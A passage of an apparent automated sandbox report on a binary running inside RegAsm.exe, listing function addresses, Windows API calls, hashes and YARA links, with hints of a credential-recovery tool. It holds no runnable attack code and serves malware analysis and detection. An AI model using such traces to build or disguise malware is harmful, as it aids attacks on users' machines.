                          • Opcode Fuzzy Hash: da4ae6558bc3f7d8c9357f2fa5faf2f590160579c2a5e59c58801196d12f8aed
                          • Instruction Fuzzy Hash: 0E01257180125895EB20E761DC467DF766C9F04314F5002FB9818F21D6E7389F958F9A
                          Function 00417570 Relevance: 4.5, APIs: 3, Instructions: 30COMMON
                          Download Yara Rule
                          APIs
                          • SetFilePointer.KERNEL32(?,?,?,00000000), ref: 00417591
                          • GetLastError.KERNEL32 ref: 004175A2
                          • GetLastError.KERNEL32 ref: 004175A8
                          Memory Dump Source
                          • Source File: 0000000D.00000002.397017263.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID: ErrorLast$FilePointer
                          • String ID:
                          • API String ID: 1156039329-0
                          • Opcode ID: cc1ef3dda130daf7e478d1b1942235eaeedb2679cbd5ead2c00b98c40fc327c6
                          • Instruction ID: d6bca62a971eeae6b8c8b5ba9af71e52dcee60bc35e592f51b1cb5e4efccb3e3
                          • Opcode Fuzzy Hash: cc1ef3dda130daf7e478d1b1942235eaeedb2679cbd5ead2c00b98c40fc327c6
                          • Instruction Fuzzy Hash: 03F03071918115FBCB009B75DC009AA7ABAFB05360B104726E822D7690E730E9409AA8
                          Function 0040A02C Relevance: 4.5, APIs: 3, Instructions: 26filetimeCOMMON
                          Download Yara Rule
                          APIs
                          • CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,02000000,00000000,00000000,00000000,004039CA,00000000,?,00000000,?,00000000), ref: 0040A044
                          • GetFileTime.KERNEL32(00000000,00000000,00000000,?), ref: 0040A058
                          • CloseHandle.KERNEL32(00000000), ref: 0040A061
                          Memory Dump Source
                          • Source File: 0000000D.00000002.397017263.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID: File$CloseCreateHandleTime
                          • String ID:
                          • API String ID: 3397143404-0
                          • Opcode ID: 6d8e9772f553e0f6d6fb1ff05c82d92c5ca35a40b5ea430072252ef77abff331
                          • Instruction ID: 1a7e7c0172e67e076cb3c0c47f72e507911c66c01d2121fa3096849e88919459
                          • Opcode Fuzzy Hash: 6d8e9772f553e0f6d6fb1ff05c82d92c5ca35a40b5ea430072252ef77abff331
                          • Instruction Fuzzy Hash: 23E04F3624036077E2311B2BAC0CF4B2E69FBCBB21F150639F565B21E086704915C665
                          Function 00409A45 Relevance: 4.5, APIs: 3, Instructions: 26COMMON
                          Download Yara Rule
                          APIs
                          • GetTempPathW.KERNEL32(00000104,?), ref: 00409A5C
                          • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
                          • GetTempFileNameW.KERNEL32(?,0040B827,00000000,?), ref: 00409A85
                          Memory Dump Source
                          • Source File: 0000000D.00000002.397017263.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID: Temp$DirectoryFileNamePathWindows
                          • String ID:
                          • API String ID: 1125800050-0
                          • Opcode ID: 18925d4506bf85468b003a70c2eb1ed6509d95f01bdd5ff44bce1f80956a42fa
                          • Instruction ID: b144c37017a21c6b5a3d1d2b3cfc872714830df517851edcd0bc871ed666fd71
                          • Opcode Fuzzy Hash: 18925d4506bf85468b003a70c2eb1ed6509d95f01bdd5ff44bce1f80956a42fa
                          • Instruction Fuzzy Hash: ACE0927A500218A7DB109B61DC4DFC777BCFB45304F0001B1B945E2161EB349A848BA8
                          Function 004175B7 Relevance: 4.5, APIs: 2, Strings: 1, Instructions: 24sleepCOMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 0000000D.00000002.397017263.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID: CloseHandleSleep
                          • String ID: }A
                          • API String ID: 252777609-2138825249
                          • Opcode ID: d8d89497e8f27404fcbaadc135fdc6127e9b1f5305c348180eeea445c8f3bba2
                          • Instruction ID: 75b622f9be81829505acbf4f2e76dfbd2ea822dc2a3448742147a61f3b6dc806
                          • Opcode Fuzzy Hash: d8d89497e8f27404fcbaadc135fdc6127e9b1f5305c348180eeea445c8f3bba2
                          • Instruction Fuzzy Hash: B7E0CD3B1045156ED500577DDCC099773E9EF892347144226F171C25D0C6759C828524
                          Function 004099F4 Relevance: 3.8, APIs: 3, Instructions: 38COMMON
                          Download Yara Rule
                          APIs
                          • malloc.MSVCRT ref: 00409A10
                          • memcpy.MSVCRT(00000000,?,?,?,?,004027EB,00000004,?,?,?,00401F8F,00000000), ref: 00409A28
                          • free.MSVCRT ref: 00409A31
                          Memory Dump Source
                          • Source File: 0000000D.00000002.397017263.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID: freemallocmemcpy
                          • String ID:
                          • API String ID: 3056473165-0
                          • Opcode ID: 7d74a04ce27a742131de704167b3a52b0161021cc553bd76998040dad9392745
                          • Instruction ID: 1240433d41d023da9ba75aa62d017d874606d7cfbee4c78203c9aa8101697722
                          • Opcode Fuzzy Hash: 7d74a04ce27a742131de704167b3a52b0161021cc553bd76998040dad9392745
                          • Instruction Fuzzy Hash: 88F0E9727092219FC708AE75A98180BB79DAF55314B12482FF404E3282D7389C50CB58
                          Function 0041EED2 Relevance: 3.2, APIs: 1, Strings: 1, Instructions: 174COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 0000000D.00000002.397017263.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID: memset
                          • String ID: BINARY
                          • API String ID: 2221118986-907554435
                          • Opcode ID: 791c3fd1504af4fac70d2b15fe323b793bb873d26b5eb9345bfe372344e0595c
                          • Instruction ID: 089a0534c11c2c8a1092ab46fa13594887108ded84822111f9e073e703b485f9
                          • Opcode Fuzzy Hash: 791c3fd1504af4fac70d2b15fe323b793bb873d26b5eb9345bfe372344e0595c
                          • Instruction Fuzzy Hash: 41518B71A047059FDB21CF69C881BEA7BE4EF48350F14446AF849CB342E738D995CBA9
                          Function 00405220 Relevance: 3.1, APIs: 2, Instructions: 88COMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                            • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104,?,?,?), ref: 0040A841
                            • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                            • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                            • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(00000000), ref: 0040A87B
                            • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                          • _mbscpy.MSVCRT(0045E298,00000000,00000155,?,00405340,?,00000000,004055B5,?,00000000,00405522,?,?,?,00000000,00000000), ref: 00405250
                          • _mbscat.MSVCRT ref: 0040525B
                          Memory Dump Source
                          • Source File: 0000000D.00000002.397017263.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID: LibraryLoad$DirectorySystem_mbscat_mbscpymemsetwcscatwcscpy
                          • String ID:
                          • API String ID: 568699880-0
                          • Opcode ID: aa271fa985e038ed7aa7a673401608462c82e67ac2ecc87e69baa60a0a084fe3
                          • Instruction ID: 606e4c6bb64acde45ccb9f726b040251bc13cbada001f714d968da5dd22dddd0
                          • Opcode Fuzzy Hash: aa271fa985e038ed7aa7a673401608462c82e67ac2ecc87e69baa60a0a084fe3
                          • Instruction Fuzzy Hash: 52212171A80F00DADA10BF769C4BB1F2694DF50715B10046FB158FA2D2EBBC95419A9D
                          Function 0041268E Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 72COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 0000000D.00000002.397017263.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID: _wcsicmp
                          • String ID: /stext
                          • API String ID: 2081463915-3817206916
                          • Opcode ID: e32263b5b8ee2531379a68aaf94d61f4c2e86babe20e9cb478eb73a56fae033c
                          • Instruction ID: 10e6e7fbaeb1b3fbdbf907bfc38f809d5841ace5bac79d7196eddb000c1bc607
                          • Opcode Fuzzy Hash: e32263b5b8ee2531379a68aaf94d61f4c2e86babe20e9cb478eb73a56fae033c
                          • Instruction Fuzzy Hash: 19218E30B00605AFD704EF6ACAC1AD9F7A9FF44304F10416AA419D7342DB79ADA18B95
                          Function 00409529 Relevance: 3.1, APIs: 2, Instructions: 66COMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 004096C3: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                          • GetFileSize.KERNEL32(00000000,00000000,00000143,00000000,00000000,00000000,?,00409690,00000000,00408801,?,?,00000143,?,?,00000143), ref: 00409552
                          • CloseHandle.KERNEL32(00000000), ref: 0040957A
                            • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                            • Part of subcall function 0040A2EF: ReadFile.KERNEL32(00000000,00000000,004450DD,00000000,00000000), ref: 0040A306
                          Memory Dump Source
                          • Source File: 0000000D.00000002.397017263.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID: File$??2@CloseCreateHandleReadSize
                          • String ID:
                          • API String ID: 1023896661-0
                          • Opcode ID: 517a28336922631f1c28e20ccf3750fd377d8614a795a490cf559f5829b7d7c1
                          • Instruction ID: f35f9952f6e959c636c436af82c7d55a8b84e599ec35ab47be9645748316c481
                          • Opcode Fuzzy Hash: 517a28336922631f1c28e20ccf3750fd377d8614a795a490cf559f5829b7d7c1
                          • Instruction Fuzzy Hash: 0D11D671A00608BFCB129F2ACC8585F7BA5EF94350B14843FF415AB392DB75DE40CA58
                          Function 0040CC26 Relevance: 3.1, APIs: 2, Instructions: 53COMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 004096C3: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                          • GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                            • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                            • Part of subcall function 0040A2EF: ReadFile.KERNEL32(00000000,00000000,004450DD,00000000,00000000), ref: 0040A306
                            • Part of subcall function 0040AB4A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,?,00401D51,00000000,00000001,00000000), ref: 0040AB63
                            • Part of subcall function 0040AB4A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,?,00401D51,00000000,00000001,00000000), ref: 0040AB88
                          • CloseHandle.KERNEL32(?), ref: 0040CC98
                            • Part of subcall function 0040B04B: ??3@YAXPAX@Z.MSVCRT(00000000,00401B44,0044E518,?,00000001,00401B95,?,00401EE4), ref: 0040B052
                          Memory Dump Source
                          • Source File: 0000000D.00000002.397017263.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID: File$ByteCharMultiWide$??2@??3@CloseCreateHandleReadSize
                          • String ID:
                          • API String ID: 2445788494-0
                          • Opcode ID: 5551154f09d9ac0fe1cac7a20b9391cb02a4855cbb9d966ae120c46d578013b8
                          • Instruction ID: dc8783d9a6c7baf78a377756874cfbd60b78407a6d3acdf6d1052ad5173bbb79
                          • Opcode Fuzzy Hash: 5551154f09d9ac0fe1cac7a20b9391cb02a4855cbb9d966ae120c46d578013b8
                          • Instruction Fuzzy Hash: 91118275804208AFDB10AF6ADC45C8A7F75FF01364711C27AF525A72A1D6349A18CBA5
                          Function 0041BC3B Relevance: 2.7, APIs: 2, Instructions: 195COMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 0000000D.00000002.397017263.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID: memcmpmemset
                          • String ID:
                          • API String ID: 1065087418-0
                          • Opcode ID: c380604b195766abe84e73715a049d0373e74049267bc02831dab12048305386
                          • Instruction ID: cf105cae5e27f97c9cd1c3f46a8d5e16e2707a712041142e317bfb3d1f631299
                          • Opcode Fuzzy Hash: c380604b195766abe84e73715a049d0373e74049267bc02831dab12048305386
                          • Instruction Fuzzy Hash: 2A615B71A01349EBDB14EFA495815EEB7B4EB04308F1440AFE609D3241E738AED4DB99
                          Function 004104FB Relevance: 2.6, APIs: 2, Instructions: 140COMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 0040ECD8: ??2@YAPAXI@Z.MSVCRT ref: 0040ECF9
                            • Part of subcall function 0040ECD8: ??3@YAXPAX@Z.MSVCRT(00000000), ref: 0040EDC0
                          • GetStdHandle.KERNEL32(000000F5), ref: 00410530
                          • CloseHandle.KERNEL32(?), ref: 00410654
                            • Part of subcall function 004096DC: CreateFileW.KERNEL32(00000001,40000000,00000001,00000000,00000002,00000000,00000000,0040E0F1,00000104), ref: 004096EE
                            • Part of subcall function 0040973C: GetLastError.KERNEL32 ref: 00409750
                            • Part of subcall function 0040973C: _snwprintf.MSVCRT ref: 0040977D
                            • Part of subcall function 0040973C: MessageBoxW.USER32(?,?,Error,00000030), ref: 00409796
                          Memory Dump Source
                          • Source File: 0000000D.00000002.397017263.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID: Handle$??2@??3@CloseCreateErrorFileLastMessage_snwprintf
                          • String ID:
                          • API String ID: 1381354015-0
                          • Opcode ID: 8fbfc2f348dbe95ddd4b5a009659ef379d3a5d6a1ec684b3882d32b59d0f1ff8
                          • Instruction ID: c777e68e994987bb064ab7fb99de871126f79ef1b866bcb434911d427814d160
                          • Opcode Fuzzy Hash: 8fbfc2f348dbe95ddd4b5a009659ef379d3a5d6a1ec684b3882d32b59d0f1ff8
                          • Instruction Fuzzy Hash: BE417231A00204EFCB25AF65C885A9E77B6EF84711F20446FF446A7291C7B99EC0DE59
                          Function 004136C0 Relevance: 1.7, APIs: 1, Instructions: 163COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 0000000D.00000002.397017263.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 47b7cceb40ac73e48e091e39f89a81a5349c65788578bfc7b3808e4b699817ff
                          • Instruction ID: 68238382b965d6cf35967491492c160b6f6d54887ef21f0023ff885919cfaa00
                          • Opcode Fuzzy Hash: 47b7cceb40ac73e48e091e39f89a81a5349c65788578bfc7b3808e4b699817ff
                          • Instruction Fuzzy Hash: 695126B5A00209AFCB14DFD4C884CEFBBB9FF88705B14C559F512AB254E735AA46CB60
                          Function 00403988 Relevance: 1.6, APIs: 1, Instructions: 56timeCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00403A16: memset.MSVCRT ref: 00403A55
                            • Part of subcall function 0040A02C: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,02000000,00000000,00000000,00000000,004039CA,00000000,?,00000000,?,00000000), ref: 0040A044
                            • Part of subcall function 0040A02C: GetFileTime.KERNEL32(00000000,00000000,00000000,?), ref: 0040A058
                            • Part of subcall function 0040A02C: CloseHandle.KERNEL32(00000000), ref: 0040A061
                          • CompareFileTime.KERNEL32(?,?,00000000,?,00000000), ref: 004039D4
                          Memory Dump Source
                          • Source File: 0000000D.00000002.397017263.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID: File$Time$CloseCompareCreateHandlememset
                          • String ID:
                          • API String ID: 2154303073-0
                          • Opcode ID: 56a49437465c6dd79f718b685576690655c489aaf9a54b49d185ed9555da5ee2
                          • Instruction ID: d476be81a684c5cf971044fbd14bb177a9e73989d843208b34704cc982626f94
                          • Opcode Fuzzy Hash: 56a49437465c6dd79f718b685576690655c489aaf9a54b49d185ed9555da5ee2
                          • Instruction Fuzzy Hash: 11111CB6D00218ABCB11EFA5D9415DEBBB9EF44315F20407BE841F7281DA389F45CB95
                          Function 004062A6 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                          Download Yara Rule
                          APIs
                          • SetFilePointerEx.KERNEL32(0040627C,?,?,00000000,00000000), ref: 004062C2
                            • Part of subcall function 0040A2EF: ReadFile.KERNEL32(00000000,00000000,004450DD,00000000,00000000), ref: 0040A306
                          Memory Dump Source
                          • Source File: 0000000D.00000002.397017263.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID: File$PointerRead
                          • String ID:
                          • API String ID: 3154509469-0
                          • Opcode ID: f15afef8f4b97f48ba7652cd85e3a24bc41a353f13de395cadc5358a8aad8795
                          • Instruction ID: d794e9b43e5f56b2d2e2073d65b81241c22a9a75ad02cc9b2284f18e77a2fe0f
                          • Opcode Fuzzy Hash: f15afef8f4b97f48ba7652cd85e3a24bc41a353f13de395cadc5358a8aad8795
                          • Instruction Fuzzy Hash: 45E01276100100FFE6619B05DC06F57FBB9FBD4710F14883DB59596174C6326851CB25
                          Function 00414561 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                          Download Yara Rule
                          APIs
                          • GetPrivateProfileIntW.KERNEL32(?,?,?,?), ref: 00414588
                            • Part of subcall function 004143F1: memset.MSVCRT ref: 00414410
                            • Part of subcall function 004143F1: _itow.MSVCRT ref: 00414427
                            • Part of subcall function 004143F1: WritePrivateProfileStringW.KERNEL32(?,?,00000000), ref: 00414436
                          Memory Dump Source
                          • Source File: 0000000D.00000002.397017263.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID: PrivateProfile$StringWrite_itowmemset
                          • String ID:
                          • API String ID: 4232544981-0
                          • Opcode ID: 58bd15f6e23597088465cc0f12acd7a0529fd6d647dc9a4ec136155e63c93ad6
                          • Instruction ID: 104e910b762de94586eb11e4c264cf061db1895f8dce3fe8c281d71359574313
                          • Opcode Fuzzy Hash: 58bd15f6e23597088465cc0f12acd7a0529fd6d647dc9a4ec136155e63c93ad6
                          • Instruction Fuzzy Hash: 8EE09232000209ABDF125F91EC01AA93B66FF54315F548469F95C05520D33295B0AB59
                          Function 00444A54 Relevance: 1.5, APIs: 1, Instructions: 18COMMON
                          Download Yara Rule
                          APIs
                          • FreeLibrary.KERNEL32(?,?,004452FB,?,?,?,0040333C,?), ref: 00444A65
                          Memory Dump Source
                          • Source File: 0000000D.00000002.397017263.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID: FreeLibrary
                          • String ID:
                          • API String ID: 3664257935-0
                          • Opcode ID: 8c39ef9eaf727128d218f1dddc73c1f621731b9859e7ea9690b0e693fd97a8de
                          • Instruction ID: 9043d1e372537a54137ae43dcd20834ee918eeaa55a47e8e1dedab4d47514996
                          • Opcode Fuzzy Hash: 8c39ef9eaf727128d218f1dddc73c1f621731b9859e7ea9690b0e693fd97a8de
                          • Instruction Fuzzy Hash: E2E0F6B5900B018FD3708F1BE944406FBF8BFE56113108A1FD4AAC2A24D7B4A1898F54
                          Function 00413F27 Relevance: 1.5, APIs: 1, Instructions: 15COMMON
                          Download Yara Rule
                          APIs
                          • K32GetModuleFileNameExW.KERNEL32(00000104,00000000,00413E1F,00000104,00413E1F,00000000,?), ref: 00413F46
                          Memory Dump Source
                          • Source File: 0000000D.00000002.397017263.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID: FileModuleName
                          • String ID:
                          • API String ID: 514040917-0
                          • Opcode ID: 115f5329003125d907eaa6c1792e5f10a4de8ddb58c38107801da2991a4e6f4b
                          • Instruction ID: eb737a8a997ed41d0f7a348c178ce8d4b8225706e43eb580f21eee6dbde26bc7
                          • Opcode Fuzzy Hash: 115f5329003125d907eaa6c1792e5f10a4de8ddb58c38107801da2991a4e6f4b
                          • Instruction Fuzzy Hash: 6FD02231B083007BEA20EE70CC00FCBA2F47F40F12F008C5AB191D2080C374C9495305
                          Function 0040A2EF Relevance: 1.5, APIs: 1, Instructions: 13fileCOMMON
                          Download Yara Rule
                          APIs
                          • ReadFile.KERNEL32(00000000,00000000,004450DD,00000000,00000000), ref: 0040A306
                          Memory Dump Source
                          • Source File: 0000000D.00000002.397017263.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID: FileRead
                          • String ID:
                          • API String ID: 2738559852-0
                          • Opcode ID: 954c46e0e75d823fede48ea8c55c2feae074eed5d1d1543d384a91c6a040f523
                          • Instruction ID: df780c2d30ec27a436fe2e8938b9b3026ee6fdf868a35847a3a0dbf755fefbc9
                          • Opcode Fuzzy Hash: 954c46e0e75d823fede48ea8c55c2feae074eed5d1d1543d384a91c6a040f523
                          • Instruction Fuzzy Hash: 6DD0C97505020DFBDF01CF81DC06FDD7B7DFB05359F108054BA0095060C7759A15AB55
                          Function 0040A30E Relevance: 1.5, APIs: 1, Instructions: 13fileCOMMON
                          Download Yara Rule
                          APIs
                          • WriteFile.KERNEL32(?,00000009,?,00000000,00000000), ref: 0040A325
                          Memory Dump Source
                          • Source File: 0000000D.00000002.397017263.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID: FileWrite
                          • String ID:
                          • API String ID: 3934441357-0
                          • Opcode ID: ceb9d1a6229db680868981d1c52190471358147ed4569e3c2bde9500725be326
                          • Instruction ID: 3280266517864b8de079c100525e5277478ec149926fcdeece843fe2c70d8c86
                          • Opcode Fuzzy Hash: ceb9d1a6229db680868981d1c52190471358147ed4569e3c2bde9500725be326
                          • Instruction Fuzzy Hash: CFD0C93501020DFBDF01CF81DC06FDD7BBDFB04359F108054BA1095060D7B59A20AB94
                          Function 00413D29 Relevance: 1.5, APIs: 1, Instructions: 13COMMON
                          Download Yara Rule
                          APIs
                          • FreeLibrary.KERNEL32(00000000,004457F2,00000000,000001F7,00000000), ref: 00413D30
                          Memory Dump Source
                          • Source File: 0000000D.00000002.397017263.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID: FreeLibrary
                          • String ID:
                          • API String ID: 3664257935-0
                          • Opcode ID: 4aed56dde2bff02888507ea152729a1ee15f70291d16ca6bd798c1e7fc2ec88c
                          • Instruction ID: 8f6381f957debc367d4a0444659be52de1bfd3a154b3998764173f6a98a011bd
                          • Opcode Fuzzy Hash: 4aed56dde2bff02888507ea152729a1ee15f70291d16ca6bd798c1e7fc2ec88c
                          • Instruction Fuzzy Hash: 1DD0C9765002229BDB10AF26EC057857378FF00712B110425E810B7594D778BEE68ADC
                          Function 004096C3 Relevance: 1.5, APIs: 1, Instructions: 10fileCOMMON
                          Download Yara Rule
                          APIs
                          • CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                          Memory Dump Source
                          • Source File: 0000000D.00000002.397017263.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID: CreateFile
                          • String ID:
                          • API String ID: 823142352-0
                          • Opcode ID: 5246709bc6ec1dabf70528f5ad42ffc01d78c7e2d09fe5df7c46969d7a5ea179
                          • Instruction ID: 15e4bfb1af8ab284213ec8af4af1ca3ed9a3c322684c6da9746693c795416a08
                          • Opcode Fuzzy Hash: 5246709bc6ec1dabf70528f5ad42ffc01d78c7e2d09fe5df7c46969d7a5ea179
                          • Instruction Fuzzy Hash: A8C092B0280200BEFE224B10EC15F36755CE744700F2008247E40F40E0C1605E108524
                          Function 004096DC Relevance: 1.5, APIs: 1, Instructions: 10fileCOMMON
                          Download Yara Rule
                          APIs
                          • CreateFileW.KERNEL32(00000001,40000000,00000001,00000000,00000002,00000000,00000000,0040E0F1,00000104), ref: 004096EE
                          Memory Dump Source
                          • Source File: 0000000D.00000002.397017263.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID: CreateFile
                          • String ID:
                          • API String ID: 823142352-0
                          • Opcode ID: ab7a8cdf7eb8bf952c1c1b88a04d9996938fd5cdd98684eb6691b5f60f9c195d
                          • Instruction ID: 13aef0f41518da9c32968a96bed17b980f0e8f352a8d1793a660c4ee04e7d177
                          • Opcode Fuzzy Hash: ab7a8cdf7eb8bf952c1c1b88a04d9996938fd5cdd98684eb6691b5f60f9c195d
                          • Instruction Fuzzy Hash: B8C012F02903007EFF204B10AC0AF37755DF784700F2048207E40F40E1C2B15C008524
                          Function 0040B04B Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                          Download Yara Rule
                          APIs
                          • ??3@YAXPAX@Z.MSVCRT(00000000,00401B44,0044E518,?,00000001,00401B95,?,00401EE4), ref: 0040B052
                          Memory Dump Source
                          • Source File: 0000000D.00000002.397017263.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID: ??3@
                          • String ID:
                          • API String ID: 613200358-0
                          • Opcode ID: ffbe44a51c26d842ca56a491b3c7d92fb1c4d2adc00a6a519549e0909776451f
                          • Instruction ID: 6ff791ec813821c2e9e24527ebed0d702daabad41f6d5d50af9b89e3d4ad0470
                          • Opcode Fuzzy Hash: ffbe44a51c26d842ca56a491b3c7d92fb1c4d2adc00a6a519549e0909776451f
                          • Instruction Fuzzy Hash: ADC09BB15117014BE7305F15D40471373D49F11727F318C1DA5D1914C2D77CD4408518
                          Function 004135E0 Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                          Download Yara Rule
                          APIs
                          • FreeLibrary.KERNEL32(?,00413603,00000000,0044557A,?,?,?,?,?,00403335,?), ref: 004135EC
                          Memory Dump Source
                          • Source File: 0000000D.00000002.397017263.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID: FreeLibrary
                          • String ID:
                          • API String ID: 3664257935-0
                          • Opcode ID: 844f7501f44133ba018c3401d7aef3826eb6c790b17bce713828cee3c51aa695
                          • Instruction ID: 97b2006ec1e2dd28fddd19cbcf35086f2a6b1d7d6d8af37d8808782836c913ed
                          • Opcode Fuzzy Hash: 844f7501f44133ba018c3401d7aef3826eb6c790b17bce713828cee3c51aa695
                          • Instruction Fuzzy Hash: C1C04C355107129BE7318F22C849793B3E8BB00767F40C818A56A85454D7BCE594CE28
                          Function 0041493C Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                          Download Yara Rule
                          APIs
